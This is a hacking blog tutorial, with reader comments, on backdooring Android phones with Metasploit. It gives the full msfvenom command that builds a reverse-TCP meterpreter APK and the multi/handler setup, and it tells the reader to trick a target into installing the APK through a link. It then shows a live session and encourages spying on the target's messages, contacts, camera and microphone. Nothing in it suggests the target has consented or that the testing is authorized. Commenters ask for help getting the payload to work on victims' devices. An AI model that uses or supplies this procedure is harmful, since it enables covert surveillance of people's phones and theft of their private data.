How to hack an android phone – metasploit

Android is the most popular mobile platform and its users are increasing day by day, and security threat too. Android phones are vulnerable and can be easily backdoored. Metasploit is the best tool in kali linux which can generate and handle a payload. Metasploit have more than 1000 exploits which is more than enough. Now we are using metasploit to hack android. We will create a backdoor package using msfvenom. Executing the apk on target device will give you a reverse meterpreter shell.

 

Demo video

 

 

Requirements

1. Metasploit framework

 

Its pre-installed in kali. If you dont find it download and install by the following command

 

# apt-get install metasploit-framework

 

Generating Payload (.apk)

Normally we use msfpayload command to generate payload, since kali 2.0 msfvenom is used over msfpayload.

# msfvenom -p android/meterpreter/reverse_tcp –platform android LHOST= “attacker IP” LPORT=444 -o /root/Desktop/payload.apk

 

An apk will be generated in the desktop. Attacker ip can be your local IP, but if the target is on WAN (anywhere on internet) provide your external ip and forward port 444 of your router.
example:
# msfvenom -p android/meterpreter/reverse_tcp –platform android LHOST=192.168.106.129 LPORT=444 -o /root/Desktop/payload.apk
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8496 bytes
Saved as: /root/Desktop/payload.apk

 

Setting up reverse handler

Now start msf reverse handler on your kali machine. Fire up metasploit

# msfconsole

Wait for a minitue, msfconsole will come up. Use handler then, set payload and option.

1. Handler

msf> use multi/handler

2. set payload

msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST “attacker ip”

5. exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.106.129:444
[*] Starting the payload handler…

 

Executing the payload on Target

To make a reverse connection you have to execute the payload on target device. If you have direct access to the target device, copy the apk that you have created and install it. Else upload it to some server and give the link and make him install the apk.

Now come back to our handler. If the target has executed it, a meterpreter shell will be spawned. Now you are the owner of the system!

[*] Started reverse handler on 192.168.106.129:444
[*] Starting the payload handler…
[*] Sending stage (56173 bytes) to 192.168.137.31
[*] Meterpreter session 1 opened (192.168.106.129:444 -> 192.168.137.31:38023) at 2015-12-08 04:50:59 -0500
meterpreter >

Now you can read messages, contacts, call log, Access camera and mic, upload and download files

help command for more options

meterpreter > help

The most interesting part which i like is spying the camera.

 

meterpreter > webcam_stream

By this command you can have a live stream on the main camera. Even though the frame rate is low you can spy them like a James bond movie. You can also spy on front camera or the secondary camera by the command

 

meterpreter > webcam_stream 2

Happy hacking !

susmith HCK

susmith HCK

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you. If you like all these stuffs add me on Facebook and Google plus.

You may also like...

12 Responses

  1. whoah this blog is wonderful i really like reading your posts. Stay up the great paintings! You realize, many individuals are hunting around for this info, you can help them greatly.

    • admin admin says:

      Thank you. I know the struggle being a noob in hacking, so i thought of sharing what i have got. Pls keep sharing 🙂

  2. shasi says:

    this blog awesome for noobs…i’m created payload app ..but this is not installing on my sony s mobile …shows app not installed ..how to over come this problem

  3. Shasi says:

    some mobiles are accepting the installation .i hav installed it one mobile ..started exploit but it stucked on starting the payload handler…victim mobile connected WLAN network but payload is not working …is there any fault …i’m using local ip address…how to find the external ip address …any solution for this

  4. Dem says:

    If you deleted the apk file on your mobile, does the backdoor/payload still affects the android mobile?

  5. conrad says:

    does it support on Ubuntu 16.04? coz everytime i tried to install metasploit on terminal i got an error ” Unable to locate package metasploit-framework”

  6. madhavan says:

    bro, my phone runs on android 4.2.1 jellibean.and the the app that i created doset works on it ….plz help me out…!

  7. Elliot says:

    I followed the steps and reached till the step where Meterpreter session is opened, after running the payload app in the mobile. But there after, it gets stuck. meterpreter console doesn’t show up as shown in the video and images. So, I can’t move further.

Leave a Reply

Your email address will not be published. Required fields are marked *